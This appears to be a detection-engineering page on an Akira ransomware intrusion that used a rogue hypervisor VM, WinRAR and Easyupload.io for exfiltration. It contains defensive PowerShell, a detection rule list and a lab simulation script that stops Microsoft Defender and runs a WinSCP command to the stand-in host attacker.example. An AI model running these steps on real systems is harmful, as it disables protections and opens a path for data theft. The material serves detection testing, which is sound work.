Akira, LimeWire, and the Sour Taste of Data Exfiltration
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
An Akira ransomware affiliate obtained unauthorized access to a hypervisor and created a new virtual machine to use as a covert staging environment. The attacker relied on this isolated VM to avoid security monitoring, prepare data with WinRAR, and exfiltrate archives through the Easyupload.io file-sharing platform. The case demonstrates how threat actors continue to abuse legitimate upload services for data theft.
Investigation
The investigation combined EDR telemetry, Windows Event Logs, and Microsoft Edge browsing history to reconstruct the intrusion. Analysts also recovered a VHDX image of the rogue virtual machine, which revealed the attacker disabling Microsoft Defender and setting up the Akira ransomware operation. Forensic review of the VM exposed the exact tools, websites, and workflow used during the staging and exfiltration phases.
Mitigation
Organizations should monitor for the appearance of new or unauthorized endpoints and virtual machine instances across their environment. Strong visibility into remote access to critical systems such as hypervisors and domain controllers is essential. It is also important to restrict or closely monitor access to known file-sharing and rapid-upload services that can be used for exfiltration.
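As an added example (not part of the original case write-up or any vendor tooling), the following PowerShell implements the first of these controls: it compares a hypervisor's current VM inventory against an approved baseline and reports anything unexpected, marking VMs created in the last week. It assumes a Hyper-V host, which the recovered VHDX suggests but the report does not name; the baseline file path and the VM names in the constructed sample inventory are made up.

```powershell
# Added example: flag virtual machines that are not in an approved baseline.
# Assumes Hyper-V (Get-VM from the Hyper-V module); other hypervisors expose an
# equivalent inventory API. Baseline path and sample VM names are hypothetical.
function Get-UnapprovedVm {
    param(
        [Parameter(Mandatory)] [object[]] $Inventory,      # objects with Name, CreationTime, State
        [Parameter(Mandatory)] [string[]] $ApprovedNames,  # names from the CMDB / change records
        [int] $RecentDays = 7                              # window for "newly created" highlighting
    )
    $cutoff = (Get-Date).AddDays(-$RecentDays)
    foreach ($vm in $Inventory) {
        # -notin is case-insensitive, so 'fs01' and 'FS01' are treated as the same VM
        if ($vm.Name -notin $ApprovedNames) {
            [pscustomobject]@{
                Name            = $vm.Name
                CreationTime    = $vm.CreationTime
                State           = $vm.State
                CreatedRecently = ($vm.CreationTime -gt $cutoff)
                Finding         = 'Not in approved baseline: match to a change record or treat as rogue'
            }
        }
    }
}

# Live inventory when the Hyper-V module is present; otherwise a constructed sample so
# the check can be exercised on any machine.
if (Get-Command Get-VM -ErrorAction SilentlyContinue) {
    $inventory = Get-VM | Select-Object Name, CreationTime, State
} else {
    $inventory = @(
        [pscustomobject]@{ Name = 'FS01'; CreationTime = Get-Date '2023-01-10'; State = 'Running' }
        [pscustomobject]@{ Name = 'DC02'; CreationTime = Get-Date '2023-01-10'; State = 'Running' }
        [pscustomobject]@{ Name = 'New Virtual Machine'; CreationTime = (Get-Date).AddHours(-6); State = 'Running' }
    )
}

# Baseline kept off the hypervisor (hypothetical path); fall back to an inline list for the demo.
$baselinePath = 'C:\SecOps\approved-vms.json'
$approved = if (Test-Path $baselinePath) { Get-Content -Raw $baselinePath | ConvertFrom-Json } else { 'FS01', 'DC02' }

Get-UnapprovedVm -Inventory $inventory -ApprovedNames $approved | Format-Table -AutoSize
```

Run it on a schedule from a management host with read access to the hypervisor rather than on the hypervisor itself, so an attacker who owns the host cannot simply stop the check. Anything it returns should either match a change record or be handled as a potential rogue VM under Response below.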
Response
If unauthorized hypervisor access is identified, immediately isolate the affected hypervisor and any newly created virtual machines. Perform forensic analysis of the VM disk images to determine the extent of data staging and exfiltration. Review access logs to trace the original entry point and confirm that no persistent attacker access remains.
Attack Flow
```mermaid
graph TB
    %% Class Definitions Section
    classDef action fill:#99ccff
    classDef tool fill:#cccccc
    classDef malware fill:#ff6666
    classDef defense fill:#ffcc00

    %% Initial Access Phase
    action_access["<b>Action</b> – <b>T1563.002 & T1021</b><br/>Unauthorized access via Remote Services<br/>and Session Hijacking targeting<br/>Domain Controller and Hypervisor."]
    class action_access action

    %% Reconnaissance Phase
    action_recon_ad["<b>Action</b> – <b>T1087.002 & T1018</b><br/>Reconnaissance by enumerating<br/>Active Directory users and computers."]
    class action_recon_ad action
    action_recon_soft["<b>Action</b> – <b>T1518</b><br/>Software Discovery on the<br/>compromised host."]
    class action_recon_soft action

    %% Defense Evasion and Staging
    action_hide_artifact["<b>Action</b> – <b>T1564.006</b><br/>Hide Artifacts by running a new<br/>virtual instance on the hypervisor<br/>to bypass security agents."]
    class action_hide_artifact action
    action_disable_defender["<b>Action</b> – <b>T1562.001</b><br/>Impair Defenses by disabling<br/>Microsoft Defender on the new VM."]
    class action_disable_defender defense

    %% Lateral Movement and Data Collection
    action_lateral_move["<b>Action</b> – <b>T1021</b><br/>Lateral Movement to the<br/>organization file server."]
    class action_lateral_move action
    tool_winrar["<b>Tool</b> – <b>Name</b>: WinRAR<br/><b>Description</b>: Used for archiving<br/>sensitive files within share folders."]
    class tool_winrar tool
    action_collect_data["<b>Action</b> – <b>T1560.001</b><br/>Data Collection by archiving<br/>sensitive files with a utility."]
    class action_collect_data action

    %% Exfiltration Phase
    action_stage_data["<b>Action</b> – <b>T1074.002</b><br/>Data Staging of archives<br/>prior to exfiltration."]
    class action_stage_data action
    action_move_tools["<b>Action</b> – <b>T1105</b><br/>Ingress Tool Transfer to move<br/>attack tools into the environment."]
    class action_move_tools action
    tool_winscp["<b>Tool</b> – <b>Name</b>: WinSCP<br/><b>Description</b>: Used for data transfer."]
    class tool_winscp tool
    tool_easyupload["<b>Tool</b> – <b>Name</b>: Easyupload.io / LimeWire<br/><b>Description</b>: Web-based file transfer<br/>service used for exfiltration."]
    class tool_easyupload tool
    action_exfiltrate["<b>Action</b> – <b>T1567.002 & T1048</b><br/>Exfiltration via web-based service<br/>and file transfer protocols."]
    class action_exfiltrate action

    %% Impact Phase
    malware_akira["<b>Malware</b> – <b>Name</b>: Akira ransomware<br/><b>File</b>: akira.exe<br/><b>Description</b>: Encrypts files on<br/>mounted network shares."]
    class malware_akira malware
    action_impact["<b>Action</b> – <b>T1486</b><br/>Impact via data encryption."]
    class action_impact action

    %% Connections
    action_access -->|leads_to| action_recon_ad
    action_access -->|leads_to| action_recon_soft
    action_recon_ad -->|leads_to| action_hide_artifact
    action_recon_soft -->|leads_to| action_hide_artifact
    action_hide_artifact -->|leads_to| action_disable_defender
    action_disable_defender -->|leads_to| action_lateral_move
    action_lateral_move -->|leads_to| action_collect_data
    action_collect_data -->|uses| tool_winrar
    action_collect_data -->|leads_to| action_stage_data
    action_stage_data -->|leads_to| action_move_tools
    action_move_tools -->|leads_to| action_exfiltrate
    action_exfiltrate -->|uses| tool_winscp
    action_exfiltrate -->|uses| tool_easyupload
    action_exfiltrate -->|leads_to| malware_akira
    malware_akira -->|results_in| action_impact
```
Detections
- LOLBAS Finger (via cmdline)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via cmdline)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
- Akira Ransomware Attack via New Virtual Machine and Data Exfiltration [Windows Process Creation]
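To make the logic behind the process-creation and DNS rules listed above concrete, here is an added PowerShell rendering of that logic run over constructed records. It is not one of the rules on this page and not the vendor's detection code; the field names follow Sysmon Event ID 1 (process creation) and Event ID 22 (DNS query), the indicator lists are illustrative, and the sample records, including the benign controls, are made up.

```powershell
# Added example: simplified detection logic for the rules listed above, run over constructed
# records. Not the page's or vendor's rule code; indicator lists are illustrative only.
$FileSharingDomains = @('easyupload.io', 'limewire.com')      # upload services abused in the case
$StagingIndicators  = @('AdUsers.txt', 'AdComp.txt', '.rar')   # AD exports and archive extension seen in staging

function Test-ProcessCreation {
    # $Event: object with Image, CommandLine, User (Sysmon Event ID 1 fields)
    param([Parameter(Mandatory)] $Event)
    $image = [System.IO.Path]::GetFileName($Event.Image).ToLowerInvariant()
    $cmd   = [string]$Event.CommandLine
    $touchesStaging = @($StagingIndicators | Where-Object { $cmd -like "*$_*" }).Count -gt 0

    # WinRAR/RAR invoked with the archive verb ("a") against the staged AD exports
    if (($image -in @('winrar.exe', 'rar.exe')) -and $cmd -match '(^|\s)a\s' -and $touchesStaging) {
        return 'WinRAR archiving of staged AD exports (T1560.001)'
    }
    # WinSCP opening an outbound SFTP/FTP/SCP session from the command line
    if ($image -eq 'winscp.exe' -and $cmd -match '(?i)open\s+"?(s?ftp|scp)://') {
        return 'WinSCP session opened to a remote host (T1048)'
    }
    if ($image -eq 'akira.exe') {
        return 'Process named after the Akira payload (T1486)'
    }
    # Service stop of Defender via sc.exe, net.exe or Stop-Service
    if ($cmd -match '(?i)\b(sc(\.exe)?\s+stop|net(\.exe)?\s+stop|Stop-Service)\b.*windefend') {
        return 'Attempt to stop the WinDefend service (T1562.001)'
    }
    return $null
}

function Test-DnsQuery {
    # $Event: object with Image, QueryName (Sysmon Event ID 22 fields)
    param([Parameter(Mandatory)] $Event)
    $q = ([string]$Event.QueryName).ToLowerInvariant()
    # Exact match or any subdomain of a listed service
    $hit = $FileSharingDomains | Where-Object { $q -eq $_ -or $q.EndsWith(".$_") } | Select-Object -First 1
    if ($hit) {
        $proc = [System.IO.Path]::GetFileName($Event.Image)
        return "Lookup of file-sharing service $hit by $proc (T1567.002)"
    }
    return $null
}

# Constructed sample telemetry; the last record in each set is a benign control.
$processEvents = @(
    [pscustomobject]@{ Image = 'C:\Program Files\WinRAR\WinRAR.exe'; CommandLine = 'WinRAR.exe a -r sensitive_data.rar AdUsers.txt AdComp.txt'; User = 'CORP\svc_backup' }
    [pscustomobject]@{ Image = 'C:\Tools\WinSCP.exe';                CommandLine = 'WinSCP.exe /command "open sftp://attacker.example"';       User = 'CORP\svc_backup' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\sc.exe';         CommandLine = 'sc stop windefend';                                         User = 'CORP\svc_backup' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\notepad.exe';    CommandLine = 'notepad.exe report.txt';                                    User = 'CORP\jdoe' }
)
$dnsEvents = @(
    [pscustomobject]@{ Image = 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'; QueryName = 'easyupload.io' }
    [pscustomobject]@{ Image = 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'; QueryName = 'www.microsoft.com' }
)

$findings = @(foreach ($e in $processEvents) {
    $detail = Test-ProcessCreation $e
    if ($detail) { [pscustomobject]@{ Source = 'ProcessCreate'; User = $e.User; Detail = $detail; Evidence = $e.CommandLine } }
})
$findings += @(foreach ($e in $dnsEvents) {
    $detail = Test-DnsQuery $e
    if ($detail) { [pscustomobject]@{ Source = 'DnsQuery'; User = $null; Detail = $detail; Evidence = $e.QueryName } }
})
$findings | Format-Table -AutoSize
```

The process-creation checks key on image name plus command-line shape rather than on the image name alone, which is what keeps ordinary WinRAR or WinSCP use by administrators out of the results; the DNS check is deliberately a plain allow/deny list, because the rule's job is to surface the first contact with a known upload service, not to judge the traffic.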
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: The commands below reproduce the specific TTPs from the attack flow so that the telemetry they generate (process-creation events carrying the observed image names and command lines, plus the Defender service state change) is the telemetry the detection logic keys on. Generic or unrelated activity would not exercise the rule, and a missing alert could then not be attributed to the rule itself.
Attack Narrative & Commands: The adversary has gained initial access and is looking to escalate the impact. They first enumerate sensitive files by checking for known text files such as AdUsers.txt. To prepare for exfiltration, they use WinRAR.exe to compress the data. They then prepare their exfiltration tool, WinSCP.exe, and finally execute the akira.exe ransomware payload. To prevent the EDR/antivirus from killing the process, they attempt to stop the WinDefend service. This specific sequence of command-line arguments and service state changes is intended to trigger the Akira-specific detection logic.
Regression Test Script:
```powershell
# Simulation Script for Akira Ransomware Detection Validation
# NOTE: Run from an elevated PowerShell session in a lab VM. The rule matches on process
# names and command lines, so WinRAR.exe, WinSCP.exe and akira.exe must actually be
# launched; if one is not on the PATH, a benign stand-in (a copy of where.exe) is run
# under that file name so the process-creation event still carries the expected values.
$ErrorActionPreference = 'Stop'
$WorkDir = Join-Path $env:TEMP 'akira_sim'
New-Item -ItemType Directory -Path $WorkDir -Force | Out-Null
Set-Location $WorkDir

function Start-Sim {
    param([string]$Exe, [string]$Arguments)
    $cmd = Get-Command $Exe -ErrorAction SilentlyContinue
    if ($cmd) { $path = $cmd.Source }
    else {
        $path = Join-Path $WorkDir $Exe
        Copy-Item "$env:SystemRoot\System32\where.exe" -Destination $path -Force
        Write-Warning "$Exe not found; launching benign stand-in $path"
    }
    if ($Arguments) { Start-Process -FilePath $path -ArgumentList $Arguments }
    else            { Start-Process -FilePath $path }
    Start-Sleep -Seconds 2
}

Write-Host "[+] Starting Akira Ransomware Simulation..." -ForegroundColor Cyan
# Seed the AD export files the later commands reference (constructed test data)
Set-Content -Path 'AdUsers.txt' -Value 'user1', 'user2'
Set-Content -Path 'AdComp.txt'  -Value 'host1', 'host2'

# 1. Simulate Discovery/Enumeration (T1083 File and Directory Discovery)
Write-Host "[+] Step 1: Simulating file enumeration via Notepad..."
Start-Sim notepad.exe 'AdUsers.txt'

# 2. Simulate Data Archiving (T1560.001 Archive via Utility)
Write-Host "[+] Step 2: Simulating data archival with WinRAR..."
Start-Sim WinRAR.exe 'a -r sensitive_data.rar AdUsers.txt AdComp.txt'

# 3. Simulate Exfiltration Tool Prep (T1105 / T1048). Reserved .example TLD: nothing real is contacted.
Write-Host "[+] Step 3: Simulating exfiltration tool execution..."
Start-Sim WinSCP.exe '/command "open sftp://attacker.example"'

# 4. Simulate Ransomware Execution (T1204.002)
Write-Host "[+] Step 4: Simulating Akira payload execution..."
Start-Sim akira.exe

# 5. Simulate Disabling Defender (T1562.001 Impair Defenses). A successful stop writes
#    System Event ID 7036; with Tamper Protection on, Stop-Service fails and is reported below.
Write-Host "[+] Step 5: Attempting to stop Microsoft Defender..."
try   { Stop-Service -Name 'WinDefend' -Force }
catch { Write-Warning "Stop-Service failed: $($_.Exception.Message)" }
Write-Host "[+] Simulation Complete. Check SIEM for alerts." -ForegroundColor Green
```
Cleanup Commands:
```powershell
# Cleanup Script
Write-Host "[+] Cleaning up simulation artifacts..." -ForegroundColor Cyan
# Restart Defender if the simulation managed to stop it
if ((Get-Service -Name 'WinDefend').Status -ne 'Running') { Start-Service -Name 'WinDefend' }
# Close the Notepad window opened in step 1
Get-Process notepad -ErrorAction SilentlyContinue |
    Where-Object { $_.MainWindowTitle -like 'AdUsers*' } | Stop-Process -Force
# Remove seeded files, the archive and any stand-in binaries, from the current directory
# and from the simulation working directory under %TEMP%
Remove-Item -Path 'AdUsers.txt', 'AdComp.txt', 'sensitive_data.rar' -ErrorAction SilentlyContinue
Set-Location $env:TEMP
Remove-Item -Path (Join-Path $env:TEMP 'akira_sim') -Recurse -Force -ErrorAction SilentlyContinue
Write-Host "[+] Cleanup complete." -ForegroundColor Green
```